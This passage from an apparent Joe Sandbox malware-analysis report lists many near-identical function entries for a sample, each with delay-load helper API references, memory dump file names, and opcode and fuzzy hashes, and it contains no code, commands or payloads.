Instruction Fuzzy Hash: 2BB012CA25C201BD714871451D47D36118CC2D4F10334461EF014D4081D7404D8006B5

Function 0018B83F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8775760efd954c7279b792cd0c8392ef448e7e47d756ab69110bd3f6b8d1242c
Instruction ID: 585b3efe459df6552e4bd0dd1bc0ba427ee19c26b78036776ced7d04e6b4b6e2
Opcode Fuzzy Hash: 8775760efd954c7279b792cd0c8392ef448e7e47d756ab69110bd3f6b8d1242c
Instruction Fuzzy Hash: 58B0128525C101BD711871851D47D36114CC2D4F10334491EF014D40C1D7404D4116B5

Function 0018B835 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: d80e3f5245ea4bf0af7890d13e71d6e87705c4b9ede78e1517bf00d1a3046903
Instruction ID: c2b1f6f7c4557bb64825c91745bd44c5ffa727ec69af3dcb2fcf2f9885086734
Opcode Fuzzy Hash: d80e3f5245ea4bf0af7890d13e71d6e87705c4b9ede78e1517bf00d1a3046903
Instruction Fuzzy Hash: A2B0128525C101BD711871865E47D36114CC2D4F10334451EF015D4481D7404E4106B5

Function 0018B821 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8854c4f3e319c354c9860a871745aad5a21044794ef6ba59bbc8e92d7f44bc9a
Instruction ID: c7ed7a005c167e44ae934e884df0a0d2a880b1d7d184f0f65b9c9460e09253ab
Opcode Fuzzy Hash: 8854c4f3e319c354c9860a871745aad5a21044794ef6ba59bbc8e92d7f44bc9a
Instruction Fuzzy Hash: 64B0128525C101BD711871851D57D36114CC2D5F10334851EF414E4081D7404D4006B5

Function 0018B853 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 986dfe443988b7c0efa3161792b741ac4077edcbd248bec50de90047a6117b57
Instruction ID: 6f1237875e79167ae665346495b52d5d746b0e9e2a96af6fdbcf368ccebb4040
Opcode Fuzzy Hash: 986dfe443988b7c0efa3161792b741ac4077edcbd248bec50de90047a6117b57
Instruction Fuzzy Hash: 7AB0128535C201BD714871455D47D36114CC2D4F10334461EF054D4081DB404D8006B5

Function 0018B849 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 582ea3e28cc920de5b8099ef8cc458faedcf930821f95da2e68395ed0047ce7d
Instruction ID: 5e831b377b1e5770316a20828b58a5d88a79febe741f4bfd4c620b6377574d83
Opcode Fuzzy Hash: 582ea3e28cc920de5b8099ef8cc458faedcf930821f95da2e68395ed0047ce7d
Instruction Fuzzy Hash: 60B0128535C101BD710871451D57D36125CC2D5F10334851EF414D4081D7404D400BB6

Function 0018B9D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0a7d06e7c8c2e964b4bf75bd4a98cc80bb7467321a86a517b78f2c175bf50052
Instruction ID: 949a1a73985f0068ceccd4b8dcdff39201fef833f7589b86a4112974c282faff
Opcode Fuzzy Hash: 0a7d06e7c8c2e964b4bf75bd4a98cc80bb7467321a86a517b78f2c175bf50052
Instruction Fuzzy Hash: 91B012C976C110BE710871441D46E3B010CC2E1B18370852EF205C4040E7406D450BB1

Function 0018B9E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7777e18a052b3cd59990fd89717aa4ad5da170b105e594642c45d85d95bb99bf
Instruction ID: 17a4eee10075a77e666b95b0b296816362c28998ea21e104226f661924331c4a
Opcode Fuzzy Hash: 7777e18a052b3cd59990fd89717aa4ad5da170b105e594642c45d85d95bb99bf
Instruction Fuzzy Hash: 62B012DAB6C110FD7108B1481D46D37010CC2D1B14370812EF504C4040E7406E400B71

Function 0018BA08 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 49b70fe710ded7a782d64d6ea7830a11f267c8e55aa92596a6c0717da425f1cc
Instruction ID: eeda242664828073c0013efe6d9d7ead798cc4eabab19b336c9579dab99742d5
Opcode Fuzzy Hash: 49b70fe710ded7a782d64d6ea7830a11f267c8e55aa92596a6c0717da425f1cc
Instruction Fuzzy Hash: A7B012D976C110BD7108B1881E46D37010CC2D1B14370812EF204C4440E7416E410B71

Function 0018BA91 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ee3c827c43f44f7ff29125567936b3220eabb30bbad34365f5e11d3cd448c4d1
Instruction ID: 386ac8e59d6097c1c6cdd4f51a8840ce2de5f65561b2133145c11738f77e7dc3
Opcode Fuzzy Hash: ee3c827c43f44f7ff29125567936b3220eabb30bbad34365f5e11d3cd448c4d1
Instruction Fuzzy Hash: C6B012CD76C101FD720C71545D42C36021CC2E6B10371C61EF414D4040D7406D002AB1

Function 0018BAAC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: df865b3fd5b13f8ec1bfdc0513e90271ba473c90b2a0b8de97e573c9e808c306
Instruction ID: 7341fe765151109715ea505d1f52b05cc74ddfbc5a559ba0fd845722ccaece31
Opcode Fuzzy Hash: df865b3fd5b13f8ec1bfdc0513e90271ba473c90b2a0b8de97e573c9e808c306
Instruction Fuzzy Hash: 1FB012CD36C401BD720C71985E42D36011CC2E6B103B0C31EF114C5440D7406D012FB1

Function 0018BACA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: b5d3e95665e90ea28f7767f8b26d725df7cd7f5cd4a610b69cf50245be60afe7
Instruction ID: 92295ee8148487fd21f606800af4e1de381feae47d0592d9c78d38610596bded
Opcode Fuzzy Hash: b5d3e95665e90ea28f7767f8b26d725df7cd7f5cd4a610b69cf50245be60afe7
Instruction Fuzzy Hash: 0CB012CD36C201BD770C71581D82D36012CC2E5F10370831EF414C5040D7406D442BB1

Function 0018BAC0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 763dbf72cf1c7a7ab41167ebd9085c57094482f17dbf684a7c074c555ae47a40
Instruction ID: ea38b78fdf318cd265a0da8e00eed3f550c8b2d6fe2101e71b2a54fe05683868
Opcode Fuzzy Hash: 763dbf72cf1c7a7ab41167ebd9085c57094482f17dbf684a7c074c555ae47a40
Instruction Fuzzy Hash: 2AB012CD76C101FD720C71581D82D36011CC2E5F10370C11EF814C5040D7406D002AB1

Function 0017665E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0017666B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 3450bdbeeef28ffaed1790282f1996386b1fad01076b79862993b8c3547598d6
Instruction ID: 0d61659a341b357be2397a158c0485b0b96e053a78fbf0f4b3c3c88984597fd0
Opcode Fuzzy Hash: 3450bdbeeef28ffaed1790282f1996386b1fad01076b79862993b8c3547598d6
Instruction Fuzzy Hash: B0C04870205200DFC704CF69EA9CE0A77AABF92B06B42C468F004CB520C734DCA0DA25

Function 0018B7F4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 751acaf4e5a04d47de822f092e7cf9acefafa11dfb75e930b3da4455a407d8a2
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: 751acaf4e5a04d47de822f092e7cf9acefafa11dfb75e930b3da4455a407d8a2
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B830 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ee2a6ce2c68235e84a27a05f307a0f53a81678eb52f67d69e290c1745453961a
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: ee2a6ce2c68235e84a27a05f307a0f53a81678eb52f67d69e290c1745453961a
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B876 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 29b9b5af212ee56f0861f0fdde6fc5dbfdb0189f598910b0477565dd1c6adc16
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: 29b9b5af212ee56f0861f0fdde6fc5dbfdb0189f598910b0477565dd1c6adc16
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B86C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 437868731403efeadc6703a3238980ff19aa414d0bb76ba2c9d0c6fc557da918
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
